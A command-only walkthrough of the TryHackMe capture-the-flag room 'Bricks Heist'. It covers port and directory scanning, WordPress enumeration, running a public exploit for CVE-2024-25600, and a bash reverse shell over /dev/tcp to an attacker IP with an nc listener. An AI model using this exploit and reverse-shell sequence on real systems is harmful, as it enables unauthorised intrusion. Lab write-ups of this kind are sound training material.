TryHack3M: Bricks Heist

Add hostname to host file

echo $VICTIM bricks.thm  >> /etc/hosts
cat /etc/hosts

Scans

Initial scan

Kali

nmap -A $VICTIM

Longer scan

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://bricks.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/443 - HTTPS

Kali

gobuster dir -k -u https://bricks.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

wpscan --url https://bricks.thm/ --disable-tls-checks

Kali

git clone https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT.git
cd CVE-2024-25600-EXPLOIT/
python CVE-2024-25600.py -u https://bricks.thm/

Initial Shell

Kali

nc -lvnp 1337

Kali(Shell)

bash -c 'exec bash -i >& /dev/tcp/10.10.181.161/1337 0>&1'

Victim

systemctl list-units --type=service --state=running

Victim

systemctl cat ubuntu.service